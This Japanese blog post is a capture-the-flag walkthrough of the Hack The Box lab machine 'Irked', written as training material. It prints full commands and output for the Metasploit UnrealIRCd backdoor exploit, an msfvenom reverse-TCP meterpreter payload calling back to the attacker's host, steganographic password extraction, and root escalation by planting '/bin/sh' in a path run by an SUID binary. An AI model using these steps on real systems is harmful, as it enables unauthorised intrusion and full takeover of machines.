【Hack the Box write-up】Irked

March 06, 2020

筆者は Hack the Box 初心者です。 何か訂正や補足、アドバイスなどありましたら、コメントか Twitter までお願いします。 さんぽし(@sanpo_shiho) | Twitter

cheat sheet

以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。 github | sanposhiho/MYCHEATSHEET

machine について

難易度は easy です。

スクリーンショット 2020-03-01 23.03.16.png

ちなみに投稿現在 easy 問題で一番評価が高い machine です。

nmap

kali@kali:~$ nmap -sC -sV -p-  10.10.10.117
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-03 08:53 EST
Nmap scan report for 10.10.10.117
Host is up (0.19s latency).
Not shown: 65527 closed ports
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open     http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open     rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          38957/udp6  status
|   100024  1          53488/tcp   status
|   100024  1          55121/tcp6  status
|_  100024  1          59725/udp   status
6697/tcp  open     irc     UnrealIRCd
8067/tcp  open     irc     UnrealIRCd
45986/tcp filtered unknown
53488/tcp open     status  1 (RPC #100024)
65534/tcp open     irc     UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4393.09 seconds

rpcbind とは

https://blog.goo.ne.jp/kwuso/e/eb14ed3801ef54fc7701c38ec141064c

80 番 port をブラウザでみる

スクリーンショット 2020-03-01 23.08.55.png

IRC とは

https://ja.wikipedia.org/wiki/Internet_Relay_Chat

UnrealIRCd の exploit 打ってみる

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   6667             yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 10.10.10.117
rhosts => 10.10.10.117
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[*] Started reverse TCP double handler on 10.10.14.8:4444
[-] 10.10.10.117:6667 - Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (10.10.10.117:6667).
[*] Exploit completed, but no session was created.
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 6697
rport => 6697
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[*] Started reverse TCP double handler on 10.10.14.8:4444
[*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
    :irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:6697 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 5IAAtu5gtJWs13ky;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "5IAAtu5gtJWs13ky\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.10.14.8:4444 -> 10.10.10.117:60793) at 2020-03-03 09:59:52 -0500


whoami
ircd

ircd ユーザーを取れました。が、

whoami
ircd
pwd
/home/ircd/Unreal3.2
cd ..
ls
Unreal3.2
cd ..
ls
djmardov
ircd
cd djmardov
ls
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
Videos
cd Desktop
ls
cd ..
cd Documents
ls
user.txt
cat user.txt
cat: user.txt: Permission denied

user.txt 見つけた!と思いましたが取れません。

色々見てみる

とりあえずこの /home/djmardov 内を探索します。 すると user.txt と同じ /home/djmardov/Documents 内に.backup というファイルを発見します。

ls -a
.
..
.backup
user.txt
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

.backup の中身は

Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

となっています。

steg が指すものは?

「steg linux」と検索すると出てきました。Steganographyという画像内にファイルを隠すというなんとも厨二心くすぐられるツールだそうです。 https://www.ostechnix.com/hide-files-inside-images-linux/

ここでなんの画像を Steganography で検証すればいいかというところでつまりました。。

他の方の writeup をチラ見すると、ポート 80 番で出てきていたあの顔の画像を調べるということでした。(なるほど…言われてみればあのページの存在意味ないですもんね…自分で気づきたかった)

ポート 80 番で出てきていたあの顔の画像を Steganography で検証

以下のページを参考にします。 https://www.blackmoreops.com/2017/01/11/steganography-in-kali-linux-hiding-data-in-image/

kali@kali:~$ sudo  apt-get install steghide
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
  libmcrypt4 libmhash2
Suggested packages:
  libmcrypt-dev mcrypt
The following NEW packages will be installed:
  libmcrypt4 libmhash2 steghide
0 upgraded, 3 newly installed, 0 to remove and 462 not upgraded.
Need to get 309 kB of archives.
After this operation, 895 kB of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 http://ftp.riken.jp/Linux/kali kali-rolling/main amd64 libmcrypt4 amd64 2.5.8-3.4+b1 [73.3 kB]
Get:2 http://ftp.riken.jp/Linux/kali kali-rolling/main amd64 libmhash2 amd64 0.9.9.9-8 [93.9 kB]
Get:3 http://ftp.riken.jp/Linux/kali kali-rolling/main amd64 steghide amd64 0.5.1-14 [142 kB]
Fetched 309 kB in 1s (232 kB/s)
Selecting previously unselected package libmcrypt4.
(Reading database ... 274809 files and directories currently installed.)
Preparing to unpack .../libmcrypt4_2.5.8-3.4+b1_amd64.deb ...
Unpacking libmcrypt4 (2.5.8-3.4+b1) ...
Selecting previously unselected package libmhash2:amd64.
Preparing to unpack .../libmhash2_0.9.9.9-8_amd64.deb ...
Unpacking libmhash2:amd64 (0.9.9.9-8) ...
Selecting previously unselected package steghide.
Preparing to unpack .../steghide_0.5.1-14_amd64.deb ...
Unpacking steghide (0.5.1-14) ...
Setting up libmhash2:amd64 (0.9.9.9-8) ...
Setting up libmcrypt4 (2.5.8-3.4+b1) ...
Setting up steghide (0.5.1-14) ...
Processing triggers for libc-bin (2.29-9) ...
Processing triggers for man-db (2.9.0-2) ...
Processing triggers for kali-menu (2020.1.7) ...
Scanning processes...
Scanning linux images...

Running kernel seems to be up-to-date.

No services need to be restarted.

No containers need to be restarted.

No user sessions are running outdated binaries.
kali@kali:~$ wget http://10.10.10.117/irked.jpg
--2020-03-03 10:39:32--  http://10.10.10.117/irked.jpg
Connecting to 10.10.10.117:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 34697 (34K) [image/jpeg]
Saving to: ‘irked.jpg’

irked.jpg                                   100%[==========================================================================================>]  33.88K   181KB/s    in 0.2s

2020-03-03 10:39:32 (181 KB/s) - ‘irked.jpg’ saved [34697/34697]

kali@kali:~$ steghide extract -sf irked.jpg
Enter passphrase:
wrote extracted data to "pass.txt".
kali@kali:~$ ls
AutoRecon  Documents  hacking-lab  Music     Pictures  __pycache__  Templates  Videos  Windows-Exploit-Suggester
Desktop    Downloads  irked.jpg    pass.txt  Public    SecLists     unicorn    vpn
kali@kali:~$ cat pass.txt
Kab6h+m+bbp2J:HG

pass.txtというものが出てきました。

ssh で djmardov としてログイン

kali@kali:~$ ssh [email protected]
The authenticity of host '10.10.10.117 (10.10.10.117)' can't be established.
ECDSA key fingerprint is SHA256:kunqU6QEf9TV3pbsZKznVcntLklRwiVobFZiJguYs4g.
Are you sure you want to continue connecting (yes/no/[fingerprint])? no
Host key verification failed.
kali@kali:~$ ssh [email protected]
The authenticity of host '10.10.10.117 (10.10.10.117)' can't be established.
ECDSA key fingerprint is SHA256:kunqU6QEf9TV3pbsZKznVcntLklRwiVobFZiJguYs4g.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.117' (ECDSA) to the list of known hosts.
[email protected]'s password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 15 08:56:32 2018 from 10.33.3.3
djmardov@irked:~$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos
djmardov@irked:~$ cd Documents/
djmardov@irked:~/Documents$ ls
user.txt

これで user.txt は取れました。

meterpreter に繋ぎ直し

msfvenom を使って一旦 meterpreter に繋ぎ直します。 https://nitesculucian.github.io/2018/07/24/msfvenom-cheat-sheet/

kali@kali:~$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=1212 -f elf > example.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes

kali@kali:~$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set lhost 10.10.14.8
lhost => 10.10.14.8
msf5 exploit(multi/handler) > set lport 1212
lport => 1212
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/handler) >
[*] Started reverse TCP handler on 10.10.14.8:1212
[*] Sending stage (985320 bytes) to 10.10.10.117
[*] Meterpreter session 5 opened (10.10.14.8:1212 -> 10.10.10.117:45534) at 2020-03-05 09:30:27 -0500

meterpreter >

suggester 使う

meterpreter > background
[*] Backgrounding session 5...
msf5 exploit(multi/handler) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester


msf5 exploit(multi/handler) > use 0
msf5 post(multi/recon/local_exploit_suggester) > set session 5
session => 5
msf5 post(multi/recon/local_exploit_suggester) > options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION          5                yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf5 post(multi/recon/local_exploit_suggester) > set SHOWDESCRIPTION true
SHOWDESCRIPTION => true
msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.117 - Collecting local exploits for x86/linux...
[*] 10.10.10.117 - 34 exploit checks are being tried...
[+] 10.10.10.117 - exploit/linux/local/network_manager_vpnc_username_priv_esc: The service is running, but could not be validated.
  This module exploits an injection vulnerability in the Network
  Manager VPNC plugin to gain root privileges. This module uses a new
  line injection vulnerability in the configured username for a VPN
  network connection to inject a `Password helper` configuration
  directive into the connection configuration. The specified helper is
  executed by Network Manager as root when the connection is started.
  Network Manager VPNC versions prior to 1.2.6 are vulnerable. This
  module has been tested successfully with VPNC versions: 1.2.4-4 on
  Debian 9.0.0 (x64); and 1.1.93-1 on Ubuntu Linux 16.04.4 (x64).
[+] 10.10.10.117 - exploit/linux/local/pkexec: The service is running, but could not be validated.
  A race condition flaw was found in the PolicyKit pkexec utility and
  polkitd daemon. A local user could use this flaw to appear as a
  privileged user to pkexec, allowing them to execute arbitrary
  commands as root by running those commands with pkexec. Those
  vulnerable include RHEL6 prior to polkit-0.96-2.el6_0.1 and Ubuntu
  libpolkit-backend-1 prior to 0.96-2ubuntu1.1 (10.10) 0.96-2ubuntu0.1
  (10.04 LTS) and 0.94-1ubuntu1.1 (9.10)
[*] Post module execution completed

2 つ suggest されたので試します。

試す

長いので載せませんが、結果はどちらも使えませんでした。。

linuxprivchecker.py で色々調べる

https://www.securitysift.com/download/linuxprivchecker.py を使います。

djmardov@irked:~$ python linuxprivchecker.py > hoge.txt

すると色々分析されて出てきます。(ちなみに linuxprivchecker.py は先ほどと同様に kali から送ってます。) 手始めに hoge.txt 内を「pass」「user」などで検索していると怪しいものがありました。

[+] SUID/SGID Files and Directories
~~~~~~~(省略)~~~~~~~
    -rwsr-xr-x 1 root root 7328 May 16  2018 /usr/bin/viewuser

(おさらい)SUID/SGID File とは

https://yukun.info/linux-suid-sgid-find/

/usr/bin/viewuser 実行してみる

djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2020-03-05 09:29 (:0)
djmardov pts/0        2020-03-05 09:29 (10.10.14.19)
djmardov pts/1        2020-03-05 09:58 (10.10.14.19)
sh: 1: /tmp/listusers: not found

/tmp/listusersが存在しないと言われます。developed っていうてますしね。

ここで着目すべきは /usr/bin/viewuser は root 権限で実行されているということです。 すなわち /tmp/listusers を自分で作成し、root 権限で実行させたい内容を書けば実行してくれます。

djmardov@irked:~$ echo '/bin/sh' > /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2020-03-05 09:29 (:0)
djmardov pts/0        2020-03-05 09:29 (10.10.14.19)
djmardov pts/1        2020-03-05 09:58 (10.10.14.19)
sh: 1: /tmp/listusers: Permission denied
djmardov@irked:~$ chmod 777 /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2020-03-05 09:29 (:0)
djmardov pts/0        2020-03-05 09:29 (10.10.14.19)
djmardov pts/1        2020-03-05 09:58 (10.10.14.19)
# whoami
root

これで root が取れました。

終わりに

最後の sh: 1: /tmp/listusers: not found で僕は完全に詰まって他の人の writeup をカンニングしてしまいました。 精進します。。

このエントリーをはてなブックマークに追加